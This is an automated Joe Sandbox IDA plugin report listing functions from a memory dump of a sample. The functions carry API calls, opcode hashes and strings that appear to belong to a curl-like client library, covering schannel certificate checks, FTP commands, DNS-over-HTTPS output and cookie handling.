Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_KDC_CERT_EXPIRED
API String ID: 1435330505-3011920606
Opcode ID: f2eaa38f4bdb51e9d98bf4c94020deb6bee76419868caccc4ec89c7b18a03b11
Instruction ID: 316b7823a15e8080486d775d702a3a44b9bf5c5637901e03d21998a2c8fdac99
Opcode Fuzzy Hash: f2eaa38f4bdb51e9d98bf4c94020deb6bee76419868caccc4ec89c7b18a03b11
Instruction Fuzzy Hash: 09118F26618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCE845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAED29 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C
SEC_E_ISSUING_CA_UNTRUSTED_KDC, xrefs: 00007FF7F1DAED29

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_ISSUING_CA_UNTRUSTED_KDC
API String ID: 1435330505-1164189158
Opcode ID: d6fdd00396279cafc7e921ad01c17cb7e8f560e99260aecc5d2f6ecaa636a8f4
Instruction ID: ac2eaae3f1f1a2b1bd9c8fce598099210e9f74f2410e56ac01355e4dbb9d2fe6
Opcode Fuzzy Hash: d6fdd00396279cafc7e921ad01c17cb7e8f560e99260aecc5d2f6ecaa636a8f4
Instruction Fuzzy Hash: FB116D22618A4285E7A8FF10A0402EDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9FADC Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 151stringCOMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D9FB66
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9FBA2
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D9FBC1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9FC60
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9FC88
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9FC98

Strings

|<>"?*, xrefs: 00007FF7F1D9FBF9
://, xrefs: 00007FF7F1D9FAFC

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: free$_strdupmallocstrncpy
String ID: ://$|<>"?*
API String ID: 985501230-1792949323
Opcode ID: 0600182a849261e9062d5569629861bf43349ed9047c124027a684d972de031b
Instruction ID: 5aedf571f90ab94b18ba8cb3024f56ce7b8aeaf7d1c6c9f8e9acdca3a772c9ab
Opcode Fuzzy Hash: 0600182a849261e9062d5569629861bf43349ed9047c124027a684d972de031b
Instruction Fuzzy Hash: 80519062A0D78241FB1AAF61A550379EAB0AF41B94FC88531CD7D077C5EFBCE84183A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DE9554 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 128COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DE9625
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DE96AD

Strings

schannel: server certificate name verification failed, xrefs: 00007FF7F1DE96C7
schannel: connection hostname (%s) did not match against certificate name (%s), xrefs: 00007FF7F1DE9680
schannel: CertGetNameString() returned no certificate name information, xrefs: 00007FF7F1DE959E
schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names, xrefs: 00007FF7F1DE96DB
schannel: CertGetNameString() returned certificate name information of unexpected size, xrefs: 00007FF7F1DE95F4
schannel: connection hostname (%s) validated against certificate name (%s), xrefs: 00007FF7F1DE9669

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _strdupfree
String ID: schannel: CertGetNameString() failed to match connection hostname (%s) against server certificate names$schannel: CertGetNameString() returned certificate name information of unexpected size$schannel: CertGetNameString() returned no certificate name information$schannel: connection hostname (%s) did not match against certificate name (%s)$schannel: connection hostname (%s) validated against certificate name (%s)$schannel: server certificate name verification failed
API String ID: 1865132094-4178580626
Opcode ID: 0957ef3460ac251cf8b0ca2eb992f015c0435e8d2265aaedf546ffa94fe6991e
Instruction ID: fa723fa59f8138a82b5e4a790cb7b9e53e4361803c7fdcfb5398102929dc84fd
Opcode Fuzzy Hash: 0957ef3460ac251cf8b0ca2eb992f015c0435e8d2265aaedf546ffa94fe6991e
Instruction Fuzzy Hash: CC41D011A0E34251FB1DFB12A5A01799760AB45BEAFC4823ADD3E037C5DFACE505C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD34D0 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 126COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DD35D8
__swprintf_l.LIBCMT ref: 00007FF7F1DD36D5

Strings

File already completely uploaded, xrefs: 00007FF7F1DD3669
APPE %s, xrefs: 00007FF7F1DD36BA
Failed to read data, xrefs: 00007FF7F1DD36A7
Could not seek stream, xrefs: 00007FF7F1DD35A5
SIZE %s, xrefs: 00007FF7F1DD35CE
STOR %s, xrefs: 00007FF7F1DD36C4

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: APPE %s$Could not seek stream$Failed to read data$File already completely uploaded$SIZE %s$STOR %s
API String ID: 1488884202-2774612732
Opcode ID: c3c9e7fcece5608abaea014060957f5e03f9ba11dc3049f54b6d1dcb31443723
Instruction ID: 632edbccc91fe59a14ba8bc56cc2dc013454d96fc2b417e7a137a5979f37a41f
Opcode Fuzzy Hash: c3c9e7fcece5608abaea014060957f5e03f9ba11dc3049f54b6d1dcb31443723
Instruction Fuzzy Hash: 7E518072A0A78295EB54AF15D4443E9B7B0EB48B98F884036DE2D073D5DFBCE445C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9BBF2 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 67COMMON

Download Yara Rule

Strings

%s/%s, xrefs: 00007FF7F1D9BC7C
Failed to extract a sensible file name from the URL to use for storage!, xrefs: 00007FF7F1D9BC04
Remote file name has no length!, xrefs: 00007FF7F1D9BC2E
Can't open '%s'!, xrefs: 00007FF7F1D9BD0B

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _strdup
String ID: %s/%s$Can't open '%s'!$Failed to extract a sensible file name from the URL to use for storage!$Remote file name has no length!
API String ID: 1169197092-535971604
Opcode ID: ee096501a0cd2191b4ba210116b6c336875ef3882e53d920967fc493fee0e01d
Instruction ID: f7c4e2b70e0616594ccb8994f9fbbb7792f2f6b438eb02b39823bf5e92e69df5
Opcode Fuzzy Hash: ee096501a0cd2191b4ba210116b6c336875ef3882e53d920967fc493fee0e01d
Instruction Fuzzy Hash: 83319F51A0AB8B91FB15FB219058579A3B1BF05784FC68431CA2E4B2D9EFACF415C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEAE8 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEB01
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEB09

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAEB3F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEB44
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEB4E
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEB56
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEB62

Strings

Unknown error %u (0x%08X), xrefs: 00007FF7F1DAEB30

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast_errno$FormatMessage__swprintf_lwcstombs
String ID: Unknown error %u (0x%08X)
API String ID: 349418278-1058733786
Opcode ID: 9468cb9c56da335274d3efc2ae4695afa0fa8663077513e2bb2379488229f49c
Instruction ID: 86daa41c1250cb680d61394db08a7fdc00ae24093aa2529108f08d2cba3538c0
Opcode Fuzzy Hash: 9468cb9c56da335274d3efc2ae4695afa0fa8663077513e2bb2379488229f49c
Instruction Fuzzy Hash: 35113C35A08B4186E715BF11A804169F771AB88B81FC88434DA5E03795CFFCE440DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DBFE4C Relevance: 13.7, APIs: 5, Strings: 4, Instructions: 165stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7F1DBFF17
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7F1DBFF31
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF7F1DBFF54

Strings

/../, xrefs: 00007FF7F1DBFF8C
/.., xrefs: 00007FF7F1DBFFBF
/./, xrefs: 00007FF7F1DBFF4A
../, xrefs: 00007FF7F1DBFF27

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: strncmp
String ID: ../$/..$/../$/./
API String ID: 1114863663-456519384
Opcode ID: 7294579a2f72cd1ef6d50c406a1f2bca51cf8538d8eede2b9b4fdbeb408006cb
Instruction ID: b20878fad7b621c9a83139a9f18256b9b9bf387ca2aaed12002aeb9df91e625a
Opcode Fuzzy Hash: 7294579a2f72cd1ef6d50c406a1f2bca51cf8538d8eede2b9b4fdbeb408006cb
Instruction Fuzzy Hash: F861E315E0C69381FB26FB259410239EBB0AB0AB95F898431C97E072D5DFADE445D3F1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DC9D88 Relevance: 13.7, APIs: 2, Strings: 7, Instructions: 151stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DC9E4F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DC9E62

Strings

Cookie: , xrefs: 00007FF7F1DC9ECA, 00007FF7F1DC9F3F
[::1], xrefs: 00007FF7F1DC9E58
Cookie, xrefs: 00007FF7F1DC9DC1
127.0.0.1, xrefs: 00007FF7F1DC9E45
%s%s=%s, xrefs: 00007FF7F1DC9EE0
localhost, xrefs: 00007FF7F1DC9E35
%s%s, xrefs: 00007FF7F1DC9F57

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: strcmp
String ID: %s%s$%s%s=%s$127.0.0.1$Cookie$Cookie: $[::1]$localhost
API String ID: 1004003707-4114525121
Opcode ID: 357ef3ad0b3f9e20b0f224f09ca8fdbbc26fba3f2290071df037ae5b11181cc7
Instruction ID: 6eacf37571206dfc57c272beb2a023b5757e45d95b7a08d856963cb652999124
Opcode Fuzzy Hash: 357ef3ad0b3f9e20b0f224f09ca8fdbbc26fba3f2290071df037ae5b11181cc7
Instruction Fuzzy Hash: 3D51BD22B08A5390EB19FB16A5102B5A3A4AF51BC8FC84431DD2D5B3D5EFBCE905C3E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAA254 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 427COMMON

Download Yara Rule

Strings

%%%02x, xrefs: 00007FF7F1DAA605
, xrefs: 00007FF7F1DAA489

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID: $%%%02x
API String ID: 0-2848173732
Opcode ID: b3b62ac39e6e61bbcb52d112f825f1df93ae01170a8829b0007525cf0d16b262
Instruction ID: 1190da22590b838663d3410d81728545392f54684a3112ace578124d6a6dd184
Opcode Fuzzy Hash: b3b62ac39e6e61bbcb52d112f825f1df93ae01170a8829b0007525cf0d16b262
Instruction Fuzzy Hash: 5C02A321A0C68646FB6DFB259554279E7B0AF45744FC84231CAAE027D2DFEDF806C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA2DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 157stringCOMMON

Download Yara Rule

APIs

strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DA2E78
__swprintf_l.LIBCMT ref: 00007FF7F1DA2F3C
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1DA2F9C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DA2FB8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DA2FDB

Strings

internal error: invalid pattern type (%d), xrefs: 00007FF7F1DA2FA5
%0*lu, xrefs: 00007FF7F1DA2F24

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: free$__acrt_iob_func__swprintf_lstrtoul
String ID: %0*lu$internal error: invalid pattern type (%d)
API String ID: 147458867-449433499
Opcode ID: 0b69f141a8b0f3f8637c97fda2f10c83fc7105382c602c7297efb503ea8d356f
Instruction ID: 2659bd580d03c713d39fc6a173d1ed50a3d617b43b7cadc6e4d7c60ecd08b194
Opcode Fuzzy Hash: 0b69f141a8b0f3f8637c97fda2f10c83fc7105382c602c7297efb503ea8d356f
Instruction Fuzzy Hash: 1151A122F0865285FB14EB66D8402BDA771BB04758F844239CE2D577CADFBCE545D3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD7B78 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 113networkCOMMON

Download Yara Rule

APIs

htons.WS2_32 ref: 00007FF7F1DD7BE7
htons.WS2_32 ref: 00007FF7F1DD7BFC
send.WS2_32 ref: 00007FF7F1DD7C9C
WSAGetLastError.WS2_32 ref: 00007FF7F1DD7CA6
send.WS2_32 ref: 00007FF7F1DD7CE8
WSAGetLastError.WS2_32 ref: 00007FF7F1DD7CF2

Strings

Sending data failed (%d), xrefs: 00007FF7F1DD7CAC, 00007FF7F1DD7CF8

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLasthtonssend
String ID: Sending data failed (%d)
API String ID: 2027122571-2319402659
Opcode ID: ac28d95ee593118a1bd79356cac12dfad59719ed3054deb94d4855cc856bdb5b
Instruction ID: fea0629205f17c8ec0364dfda05fe5056fc1e4e821390afcbe7c34f7da0c902c
Opcode Fuzzy Hash: ac28d95ee593118a1bd79356cac12dfad59719ed3054deb94d4855cc856bdb5b
Instruction Fuzzy Hash: D641AD32608A8681E704AF75D454AA8B730F754F89FC44632DB69073A8DFBCE046C391

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DE2444 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 108COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DE2504
__swprintf_l.LIBCMT ref: 00007FF7F1DE255A

Strings

CNAME: %s, xrefs: 00007FF7F1DE25CA
TTL: %u seconds, xrefs: 00007FF7F1DE2477
DoH A: %u.%u.%u.%u, xrefs: 00007FF7F1DE24BF
%s%02x%02x, xrefs: 00007FF7F1DE2542
DoH AAAA: , xrefs: 00007FF7F1DE24F3

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: %s%02x%02x$CNAME: %s$DoH A: %u.%u.%u.%u$DoH AAAA: $TTL: %u seconds
API String ID: 1488884202-408633105
Opcode ID: af9628eb09a8a4b8b72db40548a2d0d273c778839f9fc3eaed13a981285f9ad7
Instruction ID: 2fc20af6bf2b9f47872057c216186eee1d929f77d2277c976a83656e7715afa4
Opcode Fuzzy Hash: af9628eb09a8a4b8b72db40548a2d0d273c778839f9fc3eaed13a981285f9ad7
Instruction Fuzzy Hash: 8741A573A0868295D764EF15B4106AAB770FB447A5F84423AEEBE066C5CFBCD141CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD492C Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DD4977
__swprintf_l.LIBCMT ref: 00007FF7F1DD4A22

Strings

PASS %s, xrefs: 00007FF7F1DD4966
Access denied: %03d, xrefs: 00007FF7F1DD4A4A
ACCT requested but none available, xrefs: 00007FF7F1DD49EF
ACCT %s, xrefs: 00007FF7F1DD49CA

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: ACCT %s$ACCT requested but none available$Access denied: %03d$PASS %s
API String ID: 1488884202-2304280848
Opcode ID: 99ea761d28b92abdb23448e4b955d4d9075c6c2b7eebe52f541756a2fccc62b4
Instruction ID: 5a326e23cd052df5e8845cd72e2c9f228c27474f5f29dc9ac22de4448524508f
Opcode Fuzzy Hash: 99ea761d28b92abdb23448e4b955d4d9075c6c2b7eebe52f541756a2fccc62b4
Instruction Fuzzy Hash: 2F316161E0864380EB54EB5594403FAA3B09F64B88FD4A032C92E47BC8DFBCE54587E5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D94150 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 66stringCOMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D941DD
fread.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D941F1
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D941FC
ferror.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D94205
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1D94216
strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1D9421E

Strings

stdin: %s, xrefs: 00007FF7F1D94228

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __acrt_iob_func$_errnoferrorfreadstrerror
String ID: stdin: %s
API String ID: 2463866935-3123201360
Opcode ID: 5ca1bf91eea2be8477dae442d6923a079f7cac26a512d9b0cf8293ae176da189
Instruction ID: 34d059aa8cd19503f0e7b9baf7f1f0e67c8c7bbcdafc9d90dcfab130f6ee15f1
Opcode Fuzzy Hash: 5ca1bf91eea2be8477dae442d6923a079f7cac26a512d9b0cf8293ae176da189
Instruction Fuzzy Hash: B621D671B0974282EB44AB12A644329A374EF58FD1F844634DD2D43BD9DFBCE040C391

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DCC4FC Relevance: 12.1, APIs: 8, Instructions: 99COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DCC530
_mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 00007FF7F1DCC549
